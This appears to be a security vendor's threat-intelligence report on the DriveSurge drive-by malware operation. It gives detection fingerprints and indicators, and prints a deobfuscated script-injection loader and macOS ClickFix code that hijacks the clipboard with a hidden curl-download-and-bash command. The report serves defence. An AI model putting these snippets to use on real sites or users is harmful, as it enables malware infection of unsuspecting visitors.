Key Findings

• Silent Push Preemptive Cyber Defense Analysts recently observed several drive-by attack clusters developed by a threat actor to automate malware delivery at scale. We named the primary driver behind an extensive surge in ClickFix and FakeUpdates campaigns: DriveSurge.
• Current activity suggests DriveSurge operates as a specialized Initial Access Broker (IAB), using a Pay-Per-Install (PPI) model to supply downstream threat actors with high-quality victim leads.
• DriveSurge has compromised thousands of websites that set zTDS domains to traffic victims to ClickFix and Fakeupdates websites.
• Our research uncovered a series of eight technical fingerprints that map DriveSurge’s malicious infrastructure.

Executive Summary

What makes DriveSurge notable isn’t just the volume of its activity; it’s the sophistication of its infrastructure, the breadth of its targets, and the fact that it has been operating largely undetected until now.

Its primary weapon is a technique known as a Traffic Distribution System (TDS), and it specifically uses an open-source variant called zTDS, which has been in use since at least 2015, and is publicly available at ztds[.]info. Using zTDS, DriveSurge hijacks thousands of legitimate, high-reputation websites and silently redirects visitors to malware, unbeknownst to the sites’ owners or their visitors.

Based on our research, we suspect DriveSurge uses a Pay-Per-Install (PPI) model, where it is paid each time a victim’s device is successfully infected, with those leads then sold downstream to other threat actors.

---

---

How the Attacks Work

DriveSurge attacks are elegant in their deception. A user visits a legitimate website for a business, a professional services firm, or a local organization that has secretly been compromised. Hidden malicious code, injected by DriveSurge, runs in the background and routes the visitor through zTDS, which profiles the visitor and decides what to serve them next.

From there, the victim typically encounters one of two scenarios:

FakeUpdates: A convincing browser update prompt appears, impersonating Google Chrome, Mozilla Firefox, Microsoft Edge, Safari, Opera Browser, Brave Browser, Yandex Browser, Vivaldi, Samsung Internet, UC Browser, or an “Other” category browser, urging the user to download what is actually malware disguised as a legitimate browser update.

In one analyzed instance on the compromised site jclforwarding[.]com, the malicious domain check[.]first-node[.]rocks served a fake Mozilla Firefox update page. Clicking the update button triggered the download of a ZIP file containing several DLLs and a “Browser Update[.]exe”.

ClickFix: A fake error message instructs the user to copy and paste a “fix” into their terminal or PowerShell window. The “fix” is a malicious command that installs malware directly onto their system. In one confirmed instance, ClickFix was observed attempting to pull malicious code from IP 91.92.240[.]127, an address already listed in our Bulletproof Hosting Indicators of Future Attack^® (IOFA) feeds before this discovery.

Both methods are designed to exploit trust in a website the user is familiar with, in a browser they use every day, in a security prompt that looks entirely routine.

---

Research Methodology and Initial Intelligence

Our research into DriveSurge began by leveraging intelligence from our Bulletproof Hosting White Paper, which identifies NiceNIC as a registrar frequently utilized by malicious actors. By hunting for instances where NiceNIC-registered domains were loaded externally into other websites, using our proprietary web resource technology, we successfully uncovered multiple large-scale threat clusters, including DriveSurge.

In February 2026, we tested this methodology by collecting all NiceNIC domains from our IOFA feed and checking whether any had been externally loaded onto another website in the prior month. The script processed 100,000 domains per run and returned a JSON output of web resource results for analysis. From this, we identified at least 10 distinct threat clusters.

The rest of this blog describes the eight fingerprints we developed, the follow-on analysis, and the findings from our investigation of the DriveSurge cluster.

Note: This same methodology can be applied beyond NiceNIC by searching for any domains loaded externally from specific bulletproof hosters’ ASNs.

---

Eight Fingerprints: Mapping DriveSurge’s Infrastructure

Fingerprint 1: Malicious Inject (t.js Pattern)

In the initial web resources data, we identified several external resources injecting a JavaScript file following a unique pattern: a fileparameter starting with site=[32 hexadecimal character string] with the filename t.js, externally loaded relative to the compromised hostname.

For example: hxxps[:]//beacontrace[.]bond/t.js?site=0ca424475803a1cb54908a81a00bd93f

The 32-character hexadecimal string is believed to be a unique identifier for each victim website, telling the attacker’s server exactly which site the stolen data is coming from. This fingerprint enabled us to compile lists of malicious DriveSurge domains and the corresponding victim websites.

Web Search fileparameter + filename + external query link
datasource = ["webresources"] AND fileparameter ~= "^site=[0-9a-f]{32}$" AND filename = "t.js" AND external = "true"

Fingerprint 2: Malicious Inject (SHA256-derived filename)

While reviewing domains revealed in Fingerprint 1, we noticed they were also serving JavaScript files using a different pattern: filename starts with t., followed by a 12-hexadecimal string, ending with .js, externally loaded.

We discovered that the 12 hexadecimal characters matched the first 12 characters of the file’s SHA256 hash, a file-naming convention we had not previously encountered, suggesting the threat actor intentionally integrated this logic into their obfuscation. We are extending our investigation to determine if this unique signature identifies additional related threat clusters.

Web Search filename + external query link
datasource = ["webresources"] AND filename ~= "^t\.[a-f0-9]{12}\.js$" AND external = "true"

Fingerprint 3: Malicious Inject (ext-b Pattern)

A third file pattern emerged from the Fingerprint 1 domains: filename starting with ext-b or ext, followed by the first 12 characters of the file’s SHA256 (as in Fingerprint 2), ending with .js, externally loaded. As with the previous fingerprints, this yielded additional lists of malicious DriveSurge domains and victim websites.

Web Search query link
datasource = ["webresources"] AND filename ~= "^ext(-b)?\.[a-f0-9]{12}\.js$" AND external = "true"

Fingerprint 4: Malicious Server Configuration

By analyzing results from the first three fingerprints, we identified a pattern that enables us to fingerprint malicious server configurations directly, without relying on filename structure.

Web Search query link
datasource = ["webscan"] AND HHV = "809360090d06400845c9ee1802" AND header.server = "nginx/1.27.2" AND jarm = "15d3fd16d29d29d00042d43d000000ea552d307cdd65a9a94fec1293390a04" AND htmltitle = "404 Not Found" AND body_analysis.body_sha256 = ["29ac78c51bcdfe68c64830bdeb6e41437dd55e2691149741c9b78be03b6c82ea", "a84b032b49773c2318b11b1164d1aada69e940229aedbf8185c33fc7dd1d2cdf"]

Fingerprint 5: Domain Search (Infrastructure Pattern)

After reviewing all malicious DriveSurge domains from the first four fingerprints, we identified a consistent infrastructure setup pattern across the majority of them:

Field	Value
Top Level Domain (TLD)	.icu
Name Server Name	ns1.erans[.]ru
MX Name	self (self-named)
ASnum	203273, 210644
Registrar	NiceNIC

Using our Domain Search capability (available exclusively for enterprise customers), we crafted this pattern into a search that identified 90 hostnames, 39 of which were unique after removing subdomains. Of those 39 domains, 7 were not yet delivering malicious injects as of this writing (May 2026), representing pre-weaponized infrastructure we were able to identify and flag in advance:

• brightson[.]icu
• coverlink[.]icu
• datumprobe[.]icu
• eraggifts[.]icu
• keyview[.]icu
• traceglimpse[.]icu
• tracekey[.]icu

All other domains found in this search were also discoverable via Fingerprints 1, 2, or 3.

Fingerprint 6: WHOIS (Registration Email Pivot)

Checking all 82 unique malicious inject domains in our WHOIS datasource, we found several registered with the email address thiagorivera197151[@]ycyfugihih[.]cfd. A new fingerprint built on this email identified 6 additional domains not previously seen, and will help track future DriveSurge domains not yet set up for malicious inject, making it ideal for detecting TTP drift.

Web Search query link
datasource = "whois" AND email = "[email protected]"

We believe this is a dedicated DriveSurge registration email, with the first domain registered on April 8, 2026. Pivoting on the domain ycyfugihih[.]cfd (seen in the email address) reveals MX records pointing to tempmail[.]so, a temporary email service provider that also offers long-term mailbox use for registered accounts.

Since DriveSurge registered domains using this email over a two-week period, we believe they established a long-term account, meaning they likely have additional email addresses set up with tempmail[.]so.

---

Analysis of Compromised Websites Serving Fake Updates

With several fingerprints now uncovering hundreds of compromised sites, we took a closer look at one compromised domain — jclforwarding[.]com — to discover additional infrastructure. We queried to filter out obvious legitimate external resources and surface suspicious domains:

Web Search query link
datasource = ["webresources"] AND external = "true" AND hostname = "jclforwarding.com" AND resource_domain != "google.com" AND resource_domain != "googleapis.com" AND resource_domain != "wsimg.com" AND resource_domain != "gstatic.com" AND datahash = "428bd0b0ac36dfdd223b3953dbe61c0baf227f893310b03e7afe3111462019c6"

This revealed several suspicious domains being loaded into the site, some matching existing fingerprints (webgleam[.]info) and others that warranted further investigation:

1. check[.]first-node[.]rocks
2. cptoptious[.]com
3. webgleam[.]info
4. banerpanel[.]live
5. testio[.]ecartdev[.]com
6. maxintora[.]com

Fingerprint 7: WHOIS (Second Email Pivot)

Checking the new domains in the WHOIS datasource quickly revealed another threat actor email address. Using this as a new fingerprint yielded several more malicious domains:

Web Search query link
datasource = "whois" AND email = ["[email protected]"]

---

Mozilla Firefox Fake Update Plus 11 Other Browsers

The Mozilla Firefox fake update page triggered on jclforwarding[.]com was being served through check[.]first-node[.]rocks.

The update button triggered the download of a ZIP file (SHA256: 90aecb370dfb1a99a1f7de0a9c6842ab1b664521fddea16b0ec9a91f322646fc) containing several DLLs and a “Browser Update[.]exe”.

Deeper analysis of the script.js file injected by check[.]first-node[.]rocks revealed that while it served the Firefox fake update in our environment, it can impersonate 11 browsers: Google Chrome, Mozilla Firefox, Microsoft Edge, Safari, Opera Browser, Brave Browser, Yandex Browser, Vivaldi, Samsung Internet, and UC Browser, plus an “Other” category.

In the screenshot below, we can trigger a server response that highlights the server’s capabilities and what it tracks when a page visitor visits the malicious hostname. We were able to download the file, which we then uploaded to VirusTotal and now share (below):

---

zTDS — Traffic Distribution System

The domain cptoptious[.]com, also loaded into jcdlforwarding[.]com was confirmed to be serving zTDS version 1.0.3.

By scanning the infrastructure with a wordlist, we discovered a publicly accessible changelog.txt file confirming that this TDS has existed since at least 2015 and is available at ztds[.]info.

We were able to summarize the capabilities of zTDS by translating (via Google Translate) the changelog information:

1. ‘Added database/blacklist_asn.dat to block unwanted ASNs.’
2. ‘Added database/blacklist_ip.dat to block unwanted IPs.’
3. ‘Added database/signature_ref.dat to block traffic by referrer.’
4. ‘Bot signatures moved to database/signature_ua.txt.’
5. ‘Update bot IP lists from ztds[.]info.’
6. ‘Manage api_v2.php settings from the TDS admin panel.’
7. ‘Mobile operator IPs merged into one file: wap[.]txt.’
8. ‘Captcha settings moved to config.php.
9. ‘Visitor IP check in IPGrabber database (hxxp://bseolized[.]com).’

Fingerprint 8: Server Configuration (zTDS)

We fingerprinted the specific zTDS setup, and the results confirmed the threat actor has been using the same IP address since September 13, 2025, which is not surprising, as it is also labeled as a Bulletproof Hosting IOFA.

Web Search query link
datasource = ["webscan"] AND HHV = "48e9c3576c466132e2080ce519" AND jarm = "15d3fd16d29d29d00042d43d000000fe02290512647416dcf0a400ccbc0b6b" AND header.server = "nginx" AND body_analysis.body_sha256 = "0c62c11e910d7c0d6b6c9800b70e78bfd9220e1f78bd7bb34ae4c3646d05f6e5"

Fingerprint 8: Malicious Inject

We observed domains serving zTDS displayed a further unique trackable pattern: web resources with the filename jsrepo and a fileparameter starting with rnd=:

This pattern has also been independently highlighted by recent Rapid7 research, which references the jsrepo pattern alongside the malicious domain cptoptious[.]com.

Web Search query link
datasource = ["webresources"] AND filename = "jsrepo" AND fileparameter = "rnd=*"

---

Obfuscation Used to Hide zTDS

We used the results from Fingerprint 8 to identify instances of this specific zTDS usage and examine a compromised website more closely. In this case, we examined one compromised site used by a medical professional (details available to law enforcement) to see if we could identify any additional malicious infrastructure. While we know this website is compromised, it is not readily apparent upon visiting, as seen in the screenshot below.

Further digging and inspection are required to find the zTDS hidden with base64-encoded strings.

After decoding this discovered JavaScript snippet, it reveals a malicious redirect and payload-injector via zTDS that targets non-administrative WordPress visitors. It uses obfuscation techniques, such as atob() decoding, a built-in JavaScript function to decode Base64 encoding, and string concatenation to assemble URLs that fetch further malicious scripts from remote domains.

The code includes a failover mechanism that cycles through multiple backup servers to ensure the payload is successfully injected and executed in the victim’s browser. The full code can be found below, showing that the payload creates the URL to inject zTDS with the jsrepo file.

// 1. Check if it already ran and ensure the user is NOT a WordPress administrator if (!window.__performance_optimizer_v6 && (window.__performance_optimizer_v6 = true, !/wordpress_logged_in_/.test(document.cookie))) { // 2. Encoded malicious zTDS domains var urls = [ "hxxps[://]newtdsone[.]shop", // index 0 "/jsrepo?rnd=", // index 1 "hxxps[://]cptoptious[.]com", // index 2 "/jsrepo?rnd=", // index 3 "hxxps[://]captioto[.]com" // index 4 ]; // Maps how to combine the strings above var patterns = [[0, 1], [2, 3], [4, 3]]; function loadPayload(index) { if (index >= patterns.length) return; try { var fullUrl = ""; var sequence = patterns[index]; // Build the URL from the array (e.g., hxxps[://]newtdsone[.]shop/jsrepo?rnd=) for (var k = 0; k < sequence.length; k++) { fullUrl += atob(urls[sequence[k]]); } // Append a random number to bypass caching var finalUrl = fullUrl + Math.random(); // 3. Synchronous Request to fetch malicious script var xhr = new XMLHttpRequest(); xhr.open("GET", finalUrl, false); // 'false' makes it synchronous (freezes the page) xhr.send(); if (xhr.status == 200) { // 4. Injected Execution var scriptElement = document.createElement("script"); scriptElement.text = xhr.responseText; document.head.appendChild(scriptElement); } else { // If one domain fails, try the next one (Failover) loadPayload(index + 1); } } catch (error) { loadPayload(index + 1); } } loadPayload(0); }

---

ClickFix

Using a residential IP address in a safe Windows environment, we browsed to a victim website identified by the zTDS fingerprint and triggered ClickFix.

ClickFix is a social engineering tactic where compromised websites display fake browser or software update errors to trick users into running malicious code. These overlays typically instruct the victim to copy and paste a “fix” into their terminal or PowerShell window, which then installs malware directly onto their system.

This instance of ClickFix attempted to pull malicious code from IP 91.92.240[.]127, which is already listed in our Bulletproof Hosting IOFA feeds.

The server returned an “Internal Error 500” at the time of our investigation, preventing further investigation of the lead. The discovery nonetheless confirms that DriveSurge also actively uses ClickFix TTPs.

---

ADS: Advertisement Distribution System

While investigating domains loading externally into jclforwarding[.]com, we discovered banerpanel[.]live serving what appeared to be a casino slot machine advertisement.

Triggering the panel login for banerpanel[.]live at /admin/login[.]php reveals an ADS System with a Russian-language interface, which we believe stands for “Advertisement Distribution System.”

By solely pivoting on this domain in web resources, we found another unique string pattern loading the file banner-js[.]php into compromised sites.

Note: We did not create a new fingerprint for this pattern, as banerpanel[.]live is currently the only domain serving this string. As a result, a fingerprint would not likely yield any new intelligence.

Web Search query link
datasource = ["webresources"] AND resource_domain = "banerpanel.live"

We analyzed the “banner-js[.]php” script and found it to be a sophisticated banner management system designed to serve advertisements while aggressively filtering out bot traffic.

The system collects device metadata, including screen resolution, hardware specs, and browser environment, to create a unique fingerprint and verify human presence. By monitoring mouse movements, scrolls, and clicks, it calculates a “trust score” and displays banners only after a user’s first authentic interaction.

The system manages ad frequency via local storage to prevent repetitive displays and sends detailed telemetry, including behavioral metrics and an anti-forgery click hash, to a remote API for high-quality conversion tracking and fraudulent click prevention.

---

Payload and Development Server

During analysis of jcdlforwarding[.]com, we identified another suspicious hostname: testio[.]ecartdev[.]com. We attempted to enumerate various file paths to see which were active and found insights into the /login.php, /includes, and /assets pages.

Based on our analysis of these findings, as described in the following subsections, we believe the machine hosting testio.ecartdev[.]com is a payload and development server.

Path /login.php

We triggered a login panel (shown below) by visiting login[.]php after the hostname. By concealing the login panel on a non-indexed path behind a deceptively blank root, the actor has intentionally tried to hide what is likely to be a Command and Control (C2) panel.

Path /includes

We also found filenames under the /includes path, but the files could not be downloaded. The names of the files, however, offer us clues since they indicate that they provide the capabilities to obfuscate JavaScript files, which is something that is done when the malicious JavaScript injects are served through the compromised website.

Path /assets

Under the /assets path, we found the folder /assets/snippets, which contains some interesting file and folder names. This indicates that the server is likely purposed for storing malware payloads and server .html fronts to trick the victim.

In further exploring the droppers folder in /assets/snippets, we found five more folders, each storing similar files.

In the example shown below, we dive deeper into the terminal_ps1_downloader folder, where we observe the content.ps1 script, which, with minimal analysis, becomes clear that it is used to stage malware on the victim’s device.

---

Analyzing an Obfuscated Payload Leads to macOS Malware

Fingerprint 3 surfaces JavaScript files matching the pattern ext-b[12chars].js. Further analysis of one such file revealed heavy obfuscation.

Using Gemini AI for advanced de-obfuscation, we decoded the script’s logic, uncovering a sophisticated multi-stage attack vector. This automated analysis revealed the hardcoded URL of the payload and specific environment-checking parameters used to target macOS systems.

Environment Profiling and Fingerprinting

The script first verifies the victim’s operating system, filtering specifically for desktop macOS users and intentionally excluding mobile devices (iPads/iPhones) even if they report a Macintosh user agent. This ensures that “Spotlight” and “Terminal” instructions served later are contextually relevant to the victim’s OS, thereby increasing the success rate of the social engineering lure.

const userAgent = navigator.userAgent || ''; const isMac = /\bMacintosh\b/i.test(userAgent); const isMobile = /\b(iPad|iPhone|iPod)\b/i.test(userAgent) || (isMac && navigator.maxTouchPoints > 1); if (!isMac || isMobile) return;

Configuration and Attacker Endpoints

By pulling analyticsUrl dynamically from window, the attacker can rotate its tracking servers without updating the script itself. The payloadUrl points directly to the secondary-stage malware:

const analyticsUrl = window.__analyticsUrl; // Injected by a previous loader script const payloadUrl = "hxxp://46.226.166[.]57/ce3cbfc887?force=1"; // The payload server. const maliciousCmd = generateMaliciousCommand(payloadUrl);

Malicious Command Generation

The generateMaliciousCommand function prepares the actual payload. It creates a multi-stage shell command designed to download and execute a remote script. We break down the step-by-step execution as follows:

1. cd /tmp: Moves to a temporary directory to avoid leaving files in user folders.
2. curl -kfsSL: Silently downloads the secondary payload from the attacker’s C2 server.
3. bash: Executes the downloaded file.
4. rm -f: Deletes the script immediately after execution to minimize the forensic footprint.
5. Obfuscation: the script wraps the command in a base64 string; when pasted by the user, they see a “Verification ID” string, but the pipe (|) sends it to bash for decryption and execution.

let shellCmd = `cd /tmp && curl -kfsSL "${remoteUrl}" -o ${randomFile} && bash ${randomFile} && rm -f ${randomFile}`; let encodedCmd = btoa(unescape(encodeURIComponent(shellCmd))); return `echo 'I am not a robot - reCAPTCHA Verification ID: ${verificationId}' | base64 -D | bash`;

Clipboard Hijacking Logic

The script intercepts a click on a fake “I’m not a robot” checkbox. Instead of performing a security check, it silently replaces the user’s clipboard content with the malicious command. A modal then appears instructing the user to open Terminal and paste (⌘ + V) what they believe is a “verification code.” But because the clipboard was just hijacked, the user unknowingly pastes and runs the malware.

checkbox.addEventListener('click', async (e) => { e.preventDefault(); const maliciousCmd = generateMaliciousCommand(payloadUrl); await navigator.clipboard.writeText(maliciousCmd); // Hijack point document.getElementById('instruction-modal').style.display = 'block'; });

Payload Hashes and C2

The payload URL we found embedded in the script, hxxp://46[.]226[.]166[.]57/ce3cbfc887?force=1 — has the SHA256 hash 7aa15de93cf85729ddf970e8d7897f69ece3ca29608f73e784a9ba40c9cea18d.

Using VirusTotal and Hybrid Analysis, we identified a second payload server previously hosting the same payloads.

While this older payload server is currently offline, it is important to note that this was the only other server found serving the same file. Using VirusTotal, we found two additional malware samples distributed by the two servers, as detailed in the table below:

macOS Malware URL	SHA256
hxxp://147[.]45[.]42[.]200/ce3cbfc887?force=1	7aa15de93cf85729ddf970e8d7897f69ece3ca29608f73e784a9ba40c9cea18d
hxxp://46[.]226[.]166[.]57/ce3cbfc887?force=1	7aa15de93cf85729ddf970e8d7897f69ece3ca29608f73e784a9ba40c9cea18d
hxxp://147[.]45[.]42[.]200/66856ca57ed?force=1	8ecc7108cd679316bf5900e84f19b256dc399902cdede646493f502ac872cc1a
hxxp://46[.]226[.]166[.]57/66856ca57ed?force=1	8ecc7108cd679316bf5900e84f19b256dc399902cdede646493f502ac872cc1a
hxxp://147[.]45[.]42[.]200/e97b7f7ccab3a?force=1	e1ce4e6222396a58d13dddfe64c1dd21f1632bcbe11d1867d44bab4fc646883a
hxxp://46[.]226[.]166[.]57/e97b7f7ccab3a?force=1	e1ce4e6222396a58d13dddfe64c1dd21f1632bcbe11d1867d44bab4fc646883a

All payloads eventually establish a C2 connection to 147[.]45[.]42[.]205:8133, clearly visible when the malware is executed, as seen in VirusTotal.

---

Continuing to Track Drive Surge

Our team will continue tracking and analyzing DriveSurge’s infrastructure for malicious behavior and report new findings as our research progresses throughout 2026.

If your organization has encountered activity consistent with DriveSurge or has related intelligence to share, we’d welcome the opportunity to collaborate.

---

Get Started in Preemptive Cyber Defense

Interested in learning more about the Silent Push preemptive cyber defense platform?

Connect with one of our platform experts and see how Silent Push can help your team neutralize threats before they reach your perimeter.

We also offer a free Community Edition, giving security practitioners and researchers introductory access to the Silent Push platform and datasets.